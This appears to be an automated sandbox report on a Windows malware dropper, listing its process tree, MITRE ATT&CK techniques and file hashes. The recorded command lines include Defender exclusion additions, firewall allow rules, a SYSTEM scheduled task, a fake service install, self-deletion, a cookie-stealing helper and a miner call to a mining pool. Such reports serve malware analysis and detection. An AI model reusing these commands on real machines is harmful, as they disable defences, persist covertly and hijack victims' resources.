PID 2336 wrote to memory of 4956	2336	cmd.exe	sahiba_1.exe
PID 2336 wrote to memory of 4956	2336	cmd.exe	sahiba_1.exe
PID 2336 wrote to memory of 4956	2336	cmd.exe	sahiba_1.exe
PID 216 wrote to memory of 4884	216	cmd.exe	sahiba_6.exe
PID 216 wrote to memory of 4884	216	cmd.exe	sahiba_6.exe
PID 216 wrote to memory of 4884	216	cmd.exe	sahiba_6.exe
PID 4956 wrote to memory of 3388	4956	sahiba_1.exe	sahiba_1.exe
PID 4956 wrote to memory of 3388	4956	sahiba_1.exe	sahiba_1.exe
PID 4956 wrote to memory of 3388	4956	sahiba_1.exe	sahiba_1.exe
PID 4884 wrote to memory of 4572	4884	sahiba_6.exe	jfiag3g_gg.exe
PID 4884 wrote to memory of 4572	4884	sahiba_6.exe	jfiag3g_gg.exe
PID 4884 wrote to memory of 4572	4884	sahiba_6.exe	jfiag3g_gg.exe
PID 2256 wrote to memory of 3908	2256	rUNdlL32.eXe	rundll32.exe
PID 2256 wrote to memory of 3908	2256	rUNdlL32.eXe	rundll32.exe
PID 2256 wrote to memory of 3908	2256	rUNdlL32.eXe	rundll32.exe
PID 4884 wrote to memory of 928	4884	sahiba_6.exe	jfiag3g_gg.exe
PID 4884 wrote to memory of 928	4884	sahiba_6.exe	jfiag3g_gg.exe
PID 4884 wrote to memory of 928	4884	sahiba_6.exe	jfiag3g_gg.exe
PID 1556 wrote to memory of 1524	1556	sahiba_5.exe	iTa9hKm0uz7Ivxm2ZOzzmtTj.exe
PID 1556 wrote to memory of 1524	1556	sahiba_5.exe	iTa9hKm0uz7Ivxm2ZOzzmtTj.exe
PID 1556 wrote to memory of 1524	1556	sahiba_5.exe	iTa9hKm0uz7Ivxm2ZOzzmtTj.exe
PID 1556 wrote to memory of 308	1556	sahiba_5.exe	2BbmQg3vtgW5nZdtqUgLHfLN.exe
PID 1556 wrote to memory of 308	1556	sahiba_5.exe	2BbmQg3vtgW5nZdtqUgLHfLN.exe
PID 1556 wrote to memory of 308	1556	sahiba_5.exe	2BbmQg3vtgW5nZdtqUgLHfLN.exe
PID 1556 wrote to memory of 100	1556	sahiba_5.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
PID 1556 wrote to memory of 100	1556	sahiba_5.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
PID 1556 wrote to memory of 100	1556	sahiba_5.exe	hiN1Qx6G2shlTcry35ObGDO3.exe
PID 1556 wrote to memory of 32	1556	sahiba_5.exe	zagLnKPzWwbFXiwQCmanc0V9.exe
PID 1556 wrote to memory of 32	1556	sahiba_5.exe	zagLnKPzWwbFXiwQCmanc0V9.exe

C:\Users\Admin\AppData\Local\Temp\AFAC7896CF21983233C533EEAEC870610856969D98218.exe
"C:\Users\Admin\AppData\Local\Temp\AFAC7896CF21983233C533EEAEC870610856969D98218.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_1.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2336

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_1.exe
sahiba_1.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4956

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_1.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_1.exe" -a
5⤵
- Executes dropped EXE
PID:3388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2348

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_3.exe
sahiba_3.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 1072
5⤵
- Program crash
PID:1984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_4.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4692

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_4.exe
sahiba_4.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_6.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:216

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_6.exe
sahiba_6.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4884

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:4572

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_7.exe
3⤵
PID:3796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2976

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_2.exe
sahiba_2.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1568

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\sahiba_5.exe
sahiba_5.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1556

C:\Users\Admin\Documents\IksFZb08Nr0qLP1Tg9CokaU9.exe
"C:\Users\Admin\Documents\IksFZb08Nr0qLP1Tg9CokaU9.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2684

C:\Windows\SysWOW64\cmd.exe
cmd /c 22
3⤵
PID:548

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Passato.vst
3⤵
PID:4648

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:1960

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
5⤵
- Enumerates processes with tasklist
PID:3076

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
5⤵
PID:2408

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
5⤵
PID:3460

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
5⤵
- Enumerates processes with tasklist
PID:4984

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^WmtYyMxNZbIgijwHDmYeUTGDDBbHtrMhVizrHAVplCGybJDtYWshfmseSBxDfNIWKczZTXZrDPSshAyTXzIiLmYcQdkuyaUv$" Visibile.vst
5⤵
PID:464

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Quarta.exe.pif
Quarta.exe.pif A
5⤵
PID:3552

C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe
"C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe"
2⤵
- Executes dropped EXE
PID:3868

C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe
"C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe"
3⤵
PID:4752

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\755721a8-c09d-41d2-a86c-d8ba70b47c97" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:4412

C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe
"C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:4768

C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe
"C:\Users\Admin\Documents\ZSQc_MbWJUJFwqoc60AYk06Y.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:4728

C:\Users\Admin\AppData\Local\de6b7428-1362-4d5c-809d-7c39337c6690\build2.exe
"C:\Users\Admin\AppData\Local\de6b7428-1362-4d5c-809d-7c39337c6690\build2.exe"
6⤵
PID:1680

C:\Users\Admin\AppData\Local\de6b7428-1362-4d5c-809d-7c39337c6690\build2.exe
"C:\Users\Admin\AppData\Local\de6b7428-1362-4d5c-809d-7c39337c6690\build2.exe"
7⤵
PID:4360

C:\Users\Admin\Documents\hiN1Qx6G2shlTcry35ObGDO3.exe
"C:\Users\Admin\Documents\hiN1Qx6G2shlTcry35ObGDO3.exe"
2⤵
- Executes dropped EXE
PID:100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 452
3⤵
- Program crash
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 764
3⤵
- Program crash
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 772
3⤵
- Program crash
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 796
3⤵
- Executes dropped EXE
- Program crash
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 804
3⤵
- Program crash
PID:2784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 984
3⤵
- Program crash
PID:4540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 1016
3⤵
- Program crash
PID:1096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 1360
3⤵
- Program crash
PID:968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "hiN1Qx6G2shlTcry35ObGDO3.exe" /f & erase "C:\Users\Admin\Documents\hiN1Qx6G2shlTcry35ObGDO3.exe" & exit
3⤵
PID:2844

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "hiN1Qx6G2shlTcry35ObGDO3.exe" /f
4⤵
- Kills process with taskkill
PID:4444

C:\Users\Admin\Documents\2BbmQg3vtgW5nZdtqUgLHfLN.exe
"C:\Users\Admin\Documents\2BbmQg3vtgW5nZdtqUgLHfLN.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:308

C:\Users\Admin\Documents\zagLnKPzWwbFXiwQCmanc0V9.exe
"C:\Users\Admin\Documents\zagLnKPzWwbFXiwQCmanc0V9.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:32

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 32 -s 1216
3⤵
- Program crash
PID:4940

C:\Users\Admin\Documents\iTa9hKm0uz7Ivxm2ZOzzmtTj.exe
"C:\Users\Admin\Documents\iTa9hKm0uz7Ivxm2ZOzzmtTj.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 1236
3⤵
- Program crash
PID:4200

C:\Users\Admin\Documents\Nt2zPvVWdn1NsALQKomEwVHG.exe
"C:\Users\Admin\Documents\Nt2zPvVWdn1NsALQKomEwVHG.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Users\Admin\Documents\Nt2zPvVWdn1NsALQKomEwVHG.exe
"C:\Users\Admin\Documents\Nt2zPvVWdn1NsALQKomEwVHG.exe"
3⤵
- Executes dropped EXE
PID:4424

C:\Users\Admin\Documents\8SE_UZcBogXB6tvmCL_Z5rQ7.exe
"C:\Users\Admin\Documents\8SE_UZcBogXB6tvmCL_Z5rQ7.exe"
2⤵
- Executes dropped EXE
PID:4560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
3⤵
PID:4652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
3⤵
PID:4284

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:1880

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:3524

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
3⤵
- Creates scheduled task(s)
PID:4116

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
3⤵
PID:2664

C:\Users\Admin\Documents\oj1QXtx8VdnVA9BvYSmdPANB.exe
"C:\Users\Admin\Documents\oj1QXtx8VdnVA9BvYSmdPANB.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:3892

C:\Users\Admin\AppData\Local\Temp\fl.exe
"C:\Users\Admin\AppData\Local\Temp\fl.exe"
4⤵
PID:5088

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:4964

C:\Users\Admin\Documents\6cHvXbyxiA_ixDpkusezKGvd.exe
"C:\Users\Admin\Documents\6cHvXbyxiA_ixDpkusezKGvd.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 1684
3⤵
- Program crash
PID:1944

C:\Users\Admin\Documents\202U4_7V9GNYtVwAfZBFyjIz.exe
"C:\Users\Admin\Documents\202U4_7V9GNYtVwAfZBFyjIz.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:808

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
4⤵
PID:1124

C:\Users\Admin\Documents\_rAGPKC8l7xcC3gHaQXyyycK.exe
"C:\Users\Admin\Documents\_rAGPKC8l7xcC3gHaQXyyycK.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:3444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dvcasso\
3⤵
PID:4360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hsnanvvv.exe" C:\Windows\SysWOW64\dvcasso\
3⤵
PID:1776

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create dvcasso binPath= "C:\Windows\SysWOW64\dvcasso\hsnanvvv.exe /d\"C:\Users\Admin\Documents\_rAGPKC8l7xcC3gHaQXyyycK.exe\"" type= own start= auto DisplayName= "wifi support"
3⤵
PID:2784

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description dvcasso "wifi internet conection"
3⤵
PID:3436

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start dvcasso
3⤵
PID:4180

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 1044
3⤵
- Program crash
PID:3176

C:\Users\Admin\Documents\Mucsmtqnmil3tKKHXTTv8yci.exe
"C:\Users\Admin\Documents\Mucsmtqnmil3tKKHXTTv8yci.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4780

C:\Users\Admin\Documents\8ujUxjDTl94qgFS2KPlXfctO.exe
"C:\Users\Admin\Documents\8ujUxjDTl94qgFS2KPlXfctO.exe"
2⤵
- Executes dropped EXE
PID:4460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 8ujUxjDTl94qgFS2KPlXfctO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\8ujUxjDTl94qgFS2KPlXfctO.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:3612

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 8ujUxjDTl94qgFS2KPlXfctO.exe /f
4⤵
- Kills process with taskkill
PID:3152

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:444

C:\Users\Admin\Documents\XqHSVFKJIBIStVct51RCTtVb.exe
"C:\Users\Admin\Documents\XqHSVFKJIBIStVct51RCTtVb.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 1164
3⤵
- Program crash
PID:3136

C:\Users\Admin\Documents\v63mcrqbfFruND87PdmhX51t.exe
"C:\Users\Admin\Documents\v63mcrqbfFruND87PdmhX51t.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 1052
3⤵
- Program crash
PID:4116

C:\Users\Admin\Documents\TbtxkihR3hUopY7SDqE82ZrS.exe
"C:\Users\Admin\Documents\TbtxkihR3hUopY7SDqE82ZrS.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 1144
3⤵
- Program crash
PID:4896

C:\Users\Admin\Documents\GdZUVdMyW3UMthgnth2_k1pT.exe
"C:\Users\Admin\Documents\GdZUVdMyW3UMthgnth2_k1pT.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3536

C:\Users\Admin\Documents\U8y3dyEEun2JDnI66RlvPjMn.exe
"C:\Users\Admin\Documents\U8y3dyEEun2JDnI66RlvPjMn.exe"
2⤵
PID:5080

C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_windows_64.exe
C:\Users\Admin\AppData\Roaming\yaeblan_v0.7b_windows_64.exe
3⤵
- Executes dropped EXE
PID:1560

C:\Users\Admin\AppData\Roaming\ink.exe
C:\Users\Admin\AppData\Roaming\ink.exe
3⤵
- Executes dropped EXE
PID:1304

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 600
3⤵
- Program crash
PID:2816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3908 -ip 3908
1⤵
PID:2392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1304 -ip 1304
1⤵
PID:1072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 100 -ip 100
1⤵
PID:4200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 100 -ip 100
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 100 -ip 100
1⤵
PID:3052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3444 -ip 3444
1⤵
PID:1508

C:\Windows\SysWOW64\dvcasso\hsnanvvv.exe
C:\Windows\SysWOW64\dvcasso\hsnanvvv.exe /d"C:\Users\Admin\Documents\_rAGPKC8l7xcC3gHaQXyyycK.exe"
1⤵
- Executes dropped EXE
PID:1956

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2484

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
3⤵
PID:1892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1956 -s 560
2⤵
- Program crash
PID:4824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 100 -ip 100
1⤵
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1956 -ip 1956
1⤵
PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 100 -ip 100
1⤵
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 100 -ip 100
1⤵
PID:3564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 100 -ip 100
1⤵
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 100 -ip 100
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3472 -ip 3472
1⤵
PID:1628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1524 -ip 1524
1⤵
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 32 -ip 32
1⤵
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1536 -ip 1536
1⤵
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2648 -ip 2648
1⤵
PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1232 -ip 1232
1⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\1534.exe
C:\Users\Admin\AppData\Local\Temp\1534.exe
1⤵
PID:464

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurl.dll
Filesize
218KB

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurl.dll
Filesize
218KB

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurlpp.dll
Filesize
54KB

MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libcurlpp.dll
Filesize
54KB

MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libgcc_s_dw2-1.dll
Filesize
113KB

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libgcc_s_dw2-1.dll
Filesize
113KB

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libstdc++-6.dll
Filesize
647KB

MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libstdc++-6.dll
Filesize
647KB

MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libwinpthread-1.dll
Filesize
69KB

MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0498F2F6\libwinpthread-1.dll
Filesize
69KB

MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
